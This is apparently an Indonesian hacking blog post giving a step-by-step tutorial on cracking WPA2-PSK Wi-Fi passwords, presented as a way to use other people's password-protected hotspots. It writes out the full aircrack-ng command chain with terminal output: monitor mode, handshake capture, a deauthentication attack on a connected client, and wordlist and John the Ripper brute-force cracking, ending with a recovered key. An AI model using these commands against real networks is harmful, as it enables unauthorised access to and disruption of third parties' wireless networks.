Wireless Hacking – Cracking WPA / PSK Key

chmood


Selamat Datang sobat Semuanya! T.I Sniper Family..!


Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.


Oke, yang diperlukan adalah:

1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda

Β Β 

2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.

3. Koneksi wireless / wireless card

4. WPA yang ada di laptop anda.

5. John the ripper password cracker.

6. Aircrack-ng & airodump-ng (Aircrack package dah)


Download BackTrack 5 Disini:




Download Wordlist John The Ripper Disini:



Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install




Oke mari kita lanjutkan:


1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:


root@binushacker:~# airmon-ng start wlan0


Interface Chipset Driver


wlan0 Zydas zd1211 zd1211rw – [phy1]

(monitor mode enabled on mon0)


2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:



root@75n1:~# airodump-ng mon0


BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless


3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless






root@75n1:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2


CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless


BSSID STATION PWR Rate Lost Packets Probes


38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless






Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.

Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:


4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:



root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@75n1:~#






5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:


CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless


BSSID STATION PWR Rate Lost Packets Probes


38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 – 6 0 161


6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:


root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...


Aircrack-ng 1.1 r1904


[00:00:00] 48 keys tested (489.60 k/s)


KEY FOUND! [ W!R3L3$PWD ]


Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C

8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D


Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF

8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C

6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28

D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B


EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B

root@75n1:~#


Nah, passwordnya ketemu: W!R3L3$PWD


7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:


root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...


Aircrack-ng 1.1 r1904


[00:00:22] 11484 keys tested (534.50 k/s)


KEY FOUND! [ W!R3L3$PWD ]


Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C

8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D


Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF

8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C

6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28

D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B


EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B

root@75n1:~#


Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$PWD


Untuk lebih detailnya, silakan lihat video berikut: